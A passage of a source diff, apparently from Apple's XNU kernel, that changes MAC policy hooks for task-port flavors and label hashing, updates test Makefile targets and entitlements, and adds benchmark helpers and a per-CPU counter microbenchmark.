        mpo_system_check_audit_t                *mpo_system_check_audit;
index 3bcb1cba5b61398b7a8460752f048aedcc3a2553..09aa47db290788a46c3d56279695ee15c28dc9d7 100644 (file)
@@ -75,6 +75,8 @@
 #include <mach/mach_types.h>
 #include <kern/task.h>
 
+#include <os/hash.h>
+
 #include <security/mac_internal.h>
 #include <security/mac_mach_internal.h>
 
@@ -106,10 +108,38 @@ mac_cred_label_free(struct label *label)
        mac_labelzone_free(label);
 }
 
-int
-mac_cred_label_compare(struct label *a, struct label *b)
+bool
+mac_cred_label_is_equal(const struct label *a, const struct label *b)
+{
+       if (a->l_flags != b->l_flags) {
+               return false;
+       }
+       for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) {
+               const void *pa = a->l_perpolicy[slot].l_ptr;
+               const void *pb = b->l_perpolicy[slot].l_ptr;
+
+               if (pa != pb) {
+                       return false;
+               }
+       }
+       return true;
+}
+
+uint32_t
+mac_cred_label_hash_update(const struct label *a, uint32_t hash)
 {
-       return bcmp(a, b, sizeof(*a)) == 0;
+       hash = os_hash_jenkins_update(&a->l_flags,
+           sizeof(a->l_flags), hash);
+#if __has_feature(ptrauth_calls)
+       for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) {
+               const void *ptr = a->l_perpolicy[slot].l_ptr;
+               hash = os_hash_jenkins_update(&ptr, sizeof(ptr), hash);
+       }
+#else
+       hash = os_hash_jenkins_update(&a->l_perpolicy,
+           sizeof(a->l_perpolicy), hash);
+#endif
+       return hash;
 }
 
 int
@@ -410,31 +440,48 @@ mac_proc_check_fork(proc_t curp)
 }
 
 int
-mac_proc_check_get_task_name(struct ucred *cred, proc_ident_t pident)
+mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor)
 {
        int error;
 
-       MAC_CHECK(proc_check_get_task_name, cred, pident);
+       assert(flavor <= TASK_FLAVOR_NAME);
 
-       return error;
-}
+       /* Also call the old hook for compatability, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_get_task, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
 
-int
-mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident)
-{
-       int error;
+       if (flavor == TASK_FLAVOR_NAME) {
+               MAC_CHECK(proc_check_get_task_name, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
 
-       MAC_CHECK(proc_check_get_task, cred, pident);
+       MAC_CHECK(proc_check_get_task_with_flavor, cred, pident, flavor);
 
        return error;
 }
 
 int
-mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident)
+mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor)
 {
        int error;
 
-       MAC_CHECK(proc_check_expose_task, cred, pident);
+       assert(flavor <= TASK_FLAVOR_NAME);
+
+       /* Also call the old hook for compatability, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_expose_task, cred, pident);
+               if (error) {
+                       return error;
+               }
+       }
+
+       MAC_CHECK(proc_check_expose_task_with_flavor, cred, pident, flavor);
 
        return error;
 }
index 71a3e46a27bb929d6ccb157920922142056b56d0..c9d3909bbf0ced971141422bcd418e2aee43f4a4 100644 (file)
@@ -74,18 +74,33 @@ install-sr_entitlement_helper: sr_entitlement_helper
 
 sr_entitlement: OTHER_LDFLAGS += -ldarwintest_utils
 
+restrict_jit: CODE_SIGN_ENTITLEMENTS = restrict_jit.entitlements
+
 backtracing: OTHER_LDFLAGS += -framework CoreSymbolication
 backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
 data_protection: OTHER_LDFLAGS += -ldarwintest_utils -framework IOKit
 
+CUSTOM_TARGETS += immovable_send_client vm_spawn_tool
+
+exception_tests: excserver exc_helpers.c
+exception_tests: CODE_SIGN_ENTITLEMENTS = exception_tests.entitlements
+exception_tests: OTHER_CFLAGS += $(OBJROOT)/excserver.c
+exception_tests: OTHER_CFLAGS += -I $(OBJROOT)
+exception_tests: OTHER_CFLAGS += -DENTITLED=1
+
 immovable_send: excserver
 immovable_send: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT)
 immovable_send: OTHER_LDFLAGS += -ldarwintest_utils -lpthread -framework IOKit
-
-CUSTOM_TARGETS += immovable_send_client vm_spawn_tool inspect_port_nocodesign
 immovable_send: immovable_send_client
 
+immovable_send_client: immovable_send_client.c
+       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client
+
+install-immovable_send_client: immovable_send_client
+       mkdir -p $(INSTALLDIR)
+       cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/
+
 vm_spawn_tool: INVALID_ARCHS = i386
 vm_spawn_tool: vm_spawn_tool.c
        $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) vm_spawn_tool.c -o $(SYMROOT)/vm_spawn_tool
@@ -94,27 +109,30 @@ install-vm_spawn_tool: vm_spawn_tool
        mkdir -p $(INSTALLDIR)/tools
        cp $(SYMROOT)/vm_spawn_tool $(INSTALLDIR)/tools/
 
-immovable_send_client: immovable_send_client.c
-       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client
+CUSTOM_TARGETS += imm_pinned_control_port_crasher
 
-install-immovable_send_client: immovable_send_client
-       mkdir -p $(INSTALLDIR)
-       cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/
+imm_pinned_control_port: excserver
+imm_pinned_control_port: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
+imm_pinned_control_port: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT)
+imm_pinned_control_port: OTHER_LDFLAGS += -ldarwintest_utils -lpthread
+imm_pinned_control_port: imm_pinned_control_port_crasher
 
-inspect_port_nocodesign: inspect_port.c
-       $(CC) $(DT_CFLAGS) -I $(OBJROOT) -DT_NOCODESIGN=1 $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $^ -o $(SYMROOT)/inspect_port_nocodesign
-
-install-inspect_port_nocodesign: inspect_port_nocodesign
+imm_pinned_control_port_crasher: imm_pinned_control_port_crasher.c
+       $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) imm_pinned_control_port_crasher.c -o $(SYMROOT)/imm_pinned_control_port_crasher
+       $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@
+       
+install-imm_pinned_control_port_crasher: imm_pinned_control_port_crasher
        mkdir -p $(INSTALLDIR)
-       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN_ALLOCATE) -r  -i $(SYMROOT)/inspect_port_nocodesign -o $(SYMROOT)/inspect_port_nocodesign
+       cp $(SYMROOT)/imm_pinned_control_port_crasher $(INSTALLDIR)/
 
 kas_info: OTHER_LDFLAGS += -framework CoreSymbolication
 kas_info: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
 kdebug: INVALID_ARCHS = i386
 kdebug: OTHER_LDFLAGS = -framework ktrace -ldarwintest_utils -framework kperf
+kdebug: OTHER_CFLAGS += test_utils.c
 
-EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c
+EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c test_utils.c
 
 ifneq ($(PLATFORM),iPhoneOS)
 EXCLUDED_SOURCES += jumbo_va_spaces_28530648.c perf_compressor.c memorystatus_freeze_test.c vm/entitlement_increased_memory_limit.c
@@ -131,6 +149,8 @@ memorystatus_freeze_test: OTHER_CFLAGS += -ldarwintest_utils memorystatus_assert
 memorystatus_is_assertion: OTHER_LDFLAGS += -ldarwintest_utils
 memorystatus_is_assertion: OTHER_CFLAGS += memorystatus_assertion_helpers.c
 
+memorystatus_vm_map_fork: OTHER_CFLAGS += test_utils.c
+
 shared_cache_tests: OTHER_LDFLAGS += -ldarwintest_utils
 
 stackshot_tests: OTHER_CFLAGS += -Wno-objc-messaging-id
@@ -179,6 +199,17 @@ kperf_backtracing: OTHER_LDFLAGS += -framework kperf -framework kperfdata -frame
 kperf_backtracing: OTHER_LDFLAGS += -framework CoreSymbolication
 kperf_backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist
 
+text_corruption: OTHER_LDFLAGS += -ldarwintest_utils
+CUSTOM_TARGETS += text_corruption_helper
+
+text_corruption_helper:
+       $(CC) $(LDFLAGS) $(CFLAGS) text_corruption_helper.c -lm -o $(SYMROOT)/$@;
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@;
+
+install-text_corruption_helper:
+       mkdir -p $(INSTALLDIR)
+       cp $(SYMROOT)/text_corruption_helper $(INSTALLDIR)/
+
 kevent_qos: OTHER_CFLAGS += -Wno-unused-macros
 kevent_qos: OTHER_CFLAGS += -I $(OBJROOT)/
 
@@ -252,11 +283,12 @@ osptr_17: osptr_compat.cpp
        $(CXX) $(DT_CXXFLAGS) $(OTHER_CXXFLAGS) $(CXXFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
 
 priority_queue: OTHER_CXXFLAGS += -std=c++17
+zalloc_buddy: OTHER_CFLAGS += -Wno-format-pedantic
 
 os_refcnt: OTHER_CFLAGS += -I$(SRCROOT)/../libkern/ -Wno-gcc-compat -Wno-undef -O3 -flto
 
-task_inspect: CODE_SIGN_ENTITLEMENTS = task_inspect.entitlements
-task_inspect: OTHER_CFLAGS += -DENTITLED=1
+kernel_inspection: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
+kernel_inspection: OTHER_CFLAGS += -DENTITLED=1
 
 turnstile_multihop: OTHER_CFLAGS += -Wno-unused-macros
 turnstile_multihop: OTHER_CFLAGS += -I $(OBJROOT)/
@@ -286,8 +318,6 @@ $(DSTROOT)/usr/local/bin/kcdata: $(SRCROOT)/../tools/lldbmacros/kcdata.py
 
 xnu_quick_test: OTHER_CFLAGS += xnu_quick_test_helpers.c
 
-xnu_quick_test_entitled: CODE_SIGN_ENTITLEMENTS = xnu_quick_test.entitlements
-
 CUSTOM_TARGETS += vm_set_max_addr_helper
 
 vm_set_max_addr_helper: vm_set_max_addr_helper.c
@@ -377,7 +407,7 @@ endif
 
 task_info_28439149: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 
-inspect_port: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
+read_inspect: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 
 proc_info: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist
 proc_info: OTHER_LDFLAGS += -ldarwintest_utils
@@ -407,6 +437,9 @@ settimeofday_29193041_entitled: OTHER_CFLAGS += drop_priv.c
 thread_group_set_32261625: OTHER_LDFLAGS = -framework ktrace
 
 task_info: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
+task_info: OTHER_CFLAGS += test_utils.c
+
+extract_right_soft_fail: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist
 
 ifneq ($(PLATFORM),iPhoneOS)
        EXCLUDED_SOURCES += task_vm_info_decompressions.c
@@ -496,6 +529,7 @@ debug_control_port_for_pid: CODE_SIGN_ENTITLEMENTS = ./debug_control_port_for_pi
 prng: OTHER_LDFLAGS += -ldarwintest_utils
 
 preoslog: OTHER_LDFLAGS += -ldarwintest_utils
+preoslog: OTHER_CFLAGS += test_utils.c
 
 task_policy: CODE_SIGN_ENTITLEMENTS = ./task_policy_entitlement.plist
 
@@ -560,12 +594,14 @@ ifeq ($(PLATFORM),MacOSX)
 EXCLUDED_SOURCES += vm/kern_max_task_pmem.c
 endif
 
-EXCLUDED_SOURCES += vm/perf_helpers.c
+EXCLUDED_SOURCES += benchmark/helpers.c
+
+perf_vmfault: OTHER_CFLAGS += benchmark/helpers.c
 
 fault_throughput: vm/fault_throughput.c
        mkdir -p $(SYMROOT)/vm
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@
-fault_throughput: OTHER_CFLAGS += vm/perf_helpers.c
+fault_throughput: OTHER_CFLAGS += benchmark/helpers.c
 
 install-fault_throughput: fault_throughput
        mkdir -p $(INSTALLDIR)/vm
@@ -589,7 +625,7 @@ EXCLUDED_SOURCES += vm/fault_throughput.plist vm/fault_throughput.c
 perf_madvise: vm/perf_madvise.c
        mkdir -p $(SYMROOT)/vm
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@
-perf_madvise: OTHER_CFLAGS += vm/perf_helpers.c
+perf_madvise: OTHER_CFLAGS += benchmark/helpers.c
 install-perf_madvise: perf_madvise
        mkdir -p $(INSTALLDIR)/vm
        cp $(SYMROOT)/vm/perf_madvise $(INSTALLDIR)/vm/
@@ -612,13 +648,6 @@ task_create_suid_cred_unentitled: OTHER_CFLAGS += -DUNENTITLED
 task_create_suid_cred_unentitled: task_create_suid_cred.c
        $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
 
-ifeq ($(PLATFORM),MacOSX)
-test_dext_launch_56101852: OTHER_LDFLAGS += -framework CoreFoundation -framework IOKit
-test_dext_launch_56101852: CODE_SIGN_ENTITLEMENTS += test_dext_launch_56101852.entitlements
-else
-EXCLUDED_SOURCES += test_dext_launch_56101852.c
-endif
-
 ioconnectasyncmethod_57641955: OTHER_LDFLAGS += -framework IOKit
 
 ifeq ($(PLATFORM),BridgeOS)
@@ -630,4 +659,52 @@ endif
 
 test_sysctl_kern_procargs_25397314: OTHER_LDFLAGS += -framework Foundation -ldarwintest_utils
 
+INCLUDED_TEST_SOURCE_DIRS += counter
+
+EXCLUDED_SOURCES += counter/common.c
+counter/counter: OTHER_CFLAGS += counter/common.c test_utils.c
+counter/counter: OTHER_LDFLAGS += -ldarwintest_utils -ldarwintest
+
+counter/benchmark: counter/benchmark.c
+       mkdir -p $(SYMROOT)/counter
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@;
+
+counter/benchmark: OTHER_CFLAGS += counter/common.c benchmark/helpers.c
+
+install-counter/benchmark: counter/benchmark
+       mkdir -p $(INSTALLDIR)/counter
+       cp $(SYMROOT)/counter/benchmark $(INSTALLDIR)/counter/
+
+counter/benchmark_benchrun:
+       mkdir -p $(SYMROOT)/counter
+       cp $(SRCROOT)/counter/benchmark.lua $(SYMROOT)/counter/benchmark.lua
+       chmod +x $(SYMROOT)/counter/benchmark.lua
+
+install-counter/benchmark_benchrun: counter/benchmark_benchrun
+       mkdir -p $(INSTALLDIR)/counter
+       cp $(SYMROOT)/counter/benchmark.lua $(INSTALLDIR)/counter/
+       chmod +x $(INSTALLDIR)/counter/benchmark.lua
+
+CUSTOM_TARGETS += counter/benchmark counter/benchmark_benchrun
+EXCLUDED_SOURCES += counter/benchmark.c
+
+ifneq ($(PLATFORM),MacOSX)
+EXCLUDED_SOURCES += vm/page_size_globals.c
+else
+vm/page_size_globals: INVALID_ARCHS = arm64 arm64e
+endif
+
+INCLUDED_TEST_SOURCE_DIRS += lockf_uaf_poc
+
 include $(DEVELOPER_DIR)/AppleInternal/Makefiles/darwintest/Makefile.targets
+
+trial_experiments: CODE_SIGN_ENTITLEMENTS = trial_experiments.entitlements
+trial_experiments: OTHER_CFLAGS += -DENTITLED=1 test_utils.c drop_priv.c
+trial_experiments: trial_experiments.c
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
+       env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none --entitlements $(CODE_SIGN_ENTITLEMENTS) $(SYMROOT)/$@;
+
+trial_experiments_unentitled: OTHER_CFLAGS += drop_priv.c test_utils.c
+trial_experiments_unentitled: trial_experiments.c
+       $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@
index 30235c37b5dc1a363050cb942d07ba90550d6e6f..329f7f7f66c7ac27f82f7d1c87f3cb3ae8014e9c 100644 (file)
@@ -3,6 +3,8 @@
 #include <mach/mach_error.h>
 #include <mach/mach_host.h>
 
+#include "drop_priv.h"
+
 T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging"));
 
 /*
@@ -11,8 +13,6 @@ T_GLOBAL_META(T_META_NAMESPACE("xnu.debugging"));
  */
 #define LIBTRACE_PRIVATE_DATA  0x01000000
 
-extern void drop_priv(void);
-
 static bool _needs_reset;
 static uint32_t _original;
 
diff --git a/tests/benchmark/helpers.c b/tests/benchmark/helpers.c
new file mode 100644 (file)
index 0000000..37ed766
--- /dev/null
@@ -0,0 +1,84 @@
+#include <assert.h>
+#include <errno.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/sysctl.h>
+
+#include <sys/mman.h>
+
+#include "benchmark/helpers.h"
+
+#define K_CTIME_BUFFER_LEN  26
+void
+benchmark_log(bool verbose, const char *restrict fmt, ...)
+{
+       time_t now;
+       char time_buffer[K_CTIME_BUFFER_LEN];
+       struct tm local_time;
+       va_list args;
+       if (verbose) {
+               strncpy(time_buffer, "UNKNOWN", K_CTIME_BUFFER_LEN);
+
+               now = time(NULL);
+               if (now != -1) {
+                       struct tm* ret = localtime_r(&now, &local_time);
+                       if (ret == &local_time) {
+                               snprintf(time_buffer, K_CTIME_BUFFER_LEN,
+                                   "%.2d/%.2d/%.2d %.2d:%.2d:%.2d",
+                                   local_time.tm_mon + 1, local_time.tm_mday,
+                                   local_time.tm_year + 1900,
+                                   local_time.tm_hour, local_time.tm_min,
+                                   local_time.tm_sec);
+                       }
+               }
+
+               printf("%s: ", time_buffer);
+               va_start(args, fmt);
+               vprintf(fmt, args);
+               fflush(stdout);
+       }
+}
+
+uint64_t
+timespec_difference_us(const struct timespec* a, const struct timespec* b)
+{
+       assert(a->tv_sec >= b->tv_sec || a->tv_nsec >= b->tv_nsec);
+       long seconds_elapsed = a->tv_sec - b->tv_sec;
+       uint64_t nsec_elapsed;
+       if (b->tv_nsec > a->tv_nsec) {
+               seconds_elapsed--;
+               nsec_elapsed = kNumNanosecondsInSecond - (uint64_t) (b->tv_nsec - a->tv_nsec);
+       } else {
+               nsec_elapsed = (uint64_t) (a->tv_nsec - b->tv_nsec);
+       }
+       return (uint64_t) seconds_elapsed * kNumMicrosecondsInSecond + nsec_elapsed / kNumNanosecondsInMicrosecond;
+}
+
+unsigned char *
+mmap_buffer(size_t memsize)
+{
+       int fd = -1;
+       unsigned char* addr = (unsigned char *)mmap(NULL, memsize, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE,
+           fd, 0);
+       if ((void*) addr == MAP_FAILED) {
+               fprintf(stderr, "Unable to mmap a memory object: %s\n", strerror(errno));
+               exit(2);
+       }
+       return addr;
+}
+
+int
+get_ncpu(void)
+{
+       int ncpu;
+       size_t length = sizeof(ncpu);
+
+       int ret = sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0);
+       if (ret == -1) {
+               fprintf(stderr, "failed to query hw.ncpu");
+               exit(1);
+       }
+       return ncpu;
+}
diff --git a/tests/benchmark/helpers.h b/tests/benchmark/helpers.h
new file mode 100644 (file)
index 0000000..12746bc
--- /dev/null
@@ -0,0 +1,38 @@
+#ifndef BENCHMARK_PERF_HELPERS_H
+#define BENCHMARK_PERF_HELPERS_H
+
+/*
+ * Utility functions and constants used by perf tests.
+ */
+#include <inttypes.h>
+#include <time.h>
+#include <stdbool.h>
+
+/*
+ * mmap an anonymous chunk of memory.
+ */
+unsigned char *mmap_buffer(size_t size);
+/*
+ * Returns a - b in microseconds.
+ * NB: a must be >= b
+ */
+uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b);
+/*
+ * Print the message to stdout along with the current time.
+ * Also flushes stdout so that the log can help detect hangs. Don't call
+ * this function from within the measured portion of the benchmark as it will
+ * pollute your measurement.
+ *
+ * NB: Will only log if verbose == true.
+ */
+void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3)));
+
+static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000;
+static const uint64_t kNumNanosecondsInMicrosecond = 1000UL;
+static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond;
+/* Get a (wall-time) timestamp in nanoseconds */
+#define current_timestamp_ns() (clock_gettime_nsec_np(CLOCK_MONOTONIC_RAW));
+
+int get_ncpu(void);
+
+#endif /* !defined(BENCHMARK_PERF_HELPERS_H) */
diff --git a/tests/counter/benchmark.c b/tests/counter/benchmark.c
new file mode 100644 (file)
index 0000000..32471d3
--- /dev/null
@@ -0,0 +1,243 @@
+/* Per-cpu counter microbenchmarks. */
+
+#include <assert.h>
+#include <inttypes.h>
+#include <pthread.h>
+#include <stdatomic.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+#include "benchmark/helpers.h"
+#include "counter/common.h"
+
+typedef enum test_variant {
+       VARIANT_SCALABLE_COUNTER,
+       VARIANT_ATOMIC,
+       VARIANT_RACY
+} test_variant_t;
+
+static const char* kScalableCounterArgument = "scalable";
+static const char* kAtomicCounterArgument = "atomic";
+static const char* kRacyCounterArgument = "racy";
+
+static const int64_t kChunkSize = 100000000;
+
+/* Arguments parsed from the command line */
+typedef struct test_args {
+       size_t n_threads;
+       unsigned long long num_writes;
+       test_variant_t variant;
+       bool verbose;
+} test_args_t;
+
+typedef struct {
+       char _padding1[128];
+       atomic_bool tg_test_start;
+       atomic_ullong tg_num_writes_remaining;
+       atomic_ullong tg_threads_ready;
+       test_args_t tg_args;
+       uint64_t tg_start_time;
+       uint64_t tg_end_time;
+       uint64_t tg_start_value;
+       uint64_t tg_end_value;
+       char _padding2[128];
+} test_globals_t;
+
+static void parse_arguments(int argc, char** argv, test_args_t *args);
+static const char *get_sysctl_name_for_test_variant(test_variant_t variant);
+static void *writer(void *);
+static uint64_t counter_read(test_variant_t);
+
+int
+main(int argc, char** argv)
+{
+       test_globals_t globals = {0};
+       pthread_t* threads = NULL;
+       int ret;
+       int is_development_kernel;
+       size_t is_development_kernel_size = sizeof(is_development_kernel);
+       pthread_attr_t pthread_attrs;
+       uint64_t duration, writes_stored;
+       double writes_per_second;
+       double loss;
+
+       if (sysctlbyname("kern.development", &is_development_kernel,
+           &is_development_kernel_size, NULL, 0) != 0 || !is_development_kernel) {
+               fprintf(stderr, "%s requires the development kernel\n", argv[0]);
+               exit(1);
+       }
+
+       parse_arguments(argc, argv, &(globals.tg_args));
+       atomic_store(&(globals.tg_num_writes_remaining), globals.tg_args.num_writes);
+
+       threads = malloc(sizeof(pthread_t) * globals.tg_args.n_threads);
+       assert(threads);
+       ret = pthread_attr_init(&pthread_attrs);
+       assert(ret == 0);
+       ret = init_scalable_counter_test();
+       assert(ret == 0);
+       globals.tg_start_value = counter_read(globals.tg_args.variant);
+       for (size_t i = 0; i < globals.tg_args.n_threads; i++) {
+               ret = pthread_create(threads + i, &pthread_attrs, writer, &globals);
+               assert(ret == 0);
+       }
+       for (size_t i = 0; i < globals.tg_args.n_threads; i++) {
+               ret = pthread_join(threads[i], NULL);
+               assert(ret == 0);
+       }
+       ret = fini_scalable_counter_test();
+       assert(ret == 0);
+       globals.tg_end_value = counter_read(globals.tg_args.variant);
+
+       duration = globals.tg_end_time - globals.tg_start_time;
+       printf("-----Results-----\n");
+       printf("rate,loss\n");
+       writes_per_second = globals.tg_args.num_writes / ((double) duration / kNumNanosecondsInSecond);
+       writes_stored = globals.tg_end_value - globals.tg_start_value;
+       loss = (1.0 - ((double) writes_stored / globals.tg_args.num_writes)) * 100;
+       printf("%.4f,%.4f\n", writes_per_second, loss);
+       return 0;
+}
+
+static void *
+writer(void *arg)
+{
+       int ret;
+       const char* sysctl_name;
+       test_globals_t *globals = arg;
+       int64_t value = kChunkSize;
+       //size_t size = sizeof(value);
+
+       sysctl_name = get_sysctl_name_for_test_variant(globals->tg_args.variant);
+       assert(sysctl_name != NULL);
+
+       if (atomic_fetch_add(&(globals->tg_threads_ready), 1) == globals->tg_args.n_threads - 1) {
+               globals->tg_start_time = current_timestamp_ns();
+               atomic_store(&globals->tg_test_start, true);
+       }
+       while (!atomic_load(&(globals->tg_test_start))) {
+               ;
+       }
+
+       while (true) {
+               unsigned long long remaining = atomic_fetch_sub(&(globals->tg_num_writes_remaining), value);
+               if (remaining < kChunkSize || remaining > globals->tg_args.num_writes) {
+                       break;
+               }
+
+               ret = sysctlbyname(sysctl_name, NULL, NULL, &value, sizeof(value));
+               assert(ret == 0);
+               if (remaining == kChunkSize || remaining - kChunkSize > remaining) {
+                       break;
+               }
+       }
+
+       if (atomic_fetch_sub(&(globals->tg_threads_ready), 1) == 1) {
+               globals->tg_end_time = current_timestamp_ns();
+       }
+
+       return NULL;
+}
+
+static const char*
+get_sysctl_name_for_test_variant(test_variant_t variant)
+{
+       switch (variant) {
+       case VARIANT_SCALABLE_COUNTER:
+               return "kern.scalable_counter_write_benchmark";
+       case VARIANT_ATOMIC:
+               return "kern.scalable_counter_atomic_counter_write_benchmark";
+       case VARIANT_RACY:
+               return "kern.scalable_counter_racy_counter_benchmark";
+       default:
+               return NULL;
+       }
+}
+
+static const char*
+get_sysctl_load_name_for_test_variant(test_variant_t variant)
+{
+       switch (variant) {
+       case VARIANT_SCALABLE_COUNTER:
+               return "kern.scalable_counter_test_load";
+       case VARIANT_ATOMIC:
+               return "kern.scalable_counter_atomic_counter_load";
+       case VARIANT_RACY:
+               return "kern.scalable_counter_racy_counter_load";
+       default:
+               return NULL;
+       }
+}
+
+static uint64_t
+counter_read(test_variant_t variant)
+{
+       const char *sysctl_name = get_sysctl_load_name_for_test_variant(variant);
+       int result;
+       uint64_t value;
+       size_t size = sizeof(value);
+       result = sysctlbyname(sysctl_name, &value, &size, NULL, 0);
+       assert(result == 0);
+       return value;
+}
+
+static void
+print_help(char** argv)
+{
+       fprintf(stderr, "%s: <test-variant> [-v] num_writes num_threads\n", argv[0]);
+       fprintf(stderr, "\ntest variants:\n");
+       fprintf(stderr, "       %s      Benchmark scalable counters.\n", kScalableCounterArgument);
+       fprintf(stderr, "       %s      Benchmark single atomic counter.\n", kAtomicCounterArgument);
+       fprintf(stderr, "       %s      Benchmark racy counter.\n", kRacyCounterArgument);
+}
+
+static void
+parse_arguments(int argc, char** argv, test_args_t *args)
+{
+       int current_argument = 1;
+       memset(args, 0, sizeof(test_args_t));
+       if (argc < 4 || argc > 6) {
+               print_help(argv);
+               exit(1);
+       }
+       if (argv[current_argument][0] == '-') {
+               if (strcmp(argv[current_argument], "-v") == 0) {
+                       args->verbose = true;
+               } else {
+                       fprintf(stderr, "Unknown argument %s\n", argv[current_argument]);
+                       print_help(argv);
+                       exit(1);
+               }
+               current_argument++;
+       }
+       if (strncasecmp(argv[current_argument], kScalableCounterArgument, strlen(kScalableCounterArgument)) == 0) {
+               args->variant = VARIANT_SCALABLE_COUNTER;
+       } else if (strncasecmp(argv[current_argument], kAtomicCounterArgument, strlen(kAtomicCounterArgument)) == 0) {
+               args->variant = VARIANT_ATOMIC;
+       } else if (strncasecmp(argv[current_argument], kRacyCounterArgument, strlen(kRacyCounterArgument)) == 0) {
+               args->variant = VARIANT_RACY;
+       } else {
+               print_help(argv);
+               exit(1);
+       }
+       current_argument++;
+
+       long num_writes = strtol(argv[current_argument++], NULL, 10);
+       if (num_writes == 0) {
+               print_help(argv);
+               exit(1);
+       }
+       long num_cores = strtol(argv[current_argument++], NULL, 10);
+       if (num_cores == 0) {
+               print_help(argv);
+               exit(1);
+       }
+       assert(num_cores > 0 && num_cores <= get_ncpu());
+       args->n_threads = (unsigned int) num_cores;
+       args->num_writes = (unsigned long long) num_writes;
+}
diff --git a/tests/counter/benchmark.lua b/tests/counter/benchmark.lua
new file mode 100644 (file)
index 0000000..2759e87
--- /dev/null
@@ -0,0 +1,107 @@
+#!/usr/local/bin/recon
+require 'strict'
+
+local benchrun = require 'benchrun'
+local perfdata = require 'perfdata'
+local sysctl = require 'sysctl'
+local csv = require 'csv'
+
+local kDefaultNumWrites = 10000000000
+
+local benchmark = benchrun.new {
+    name = 'xnu.per_cpu_counter',
+    version = 1,
+    arg = arg,
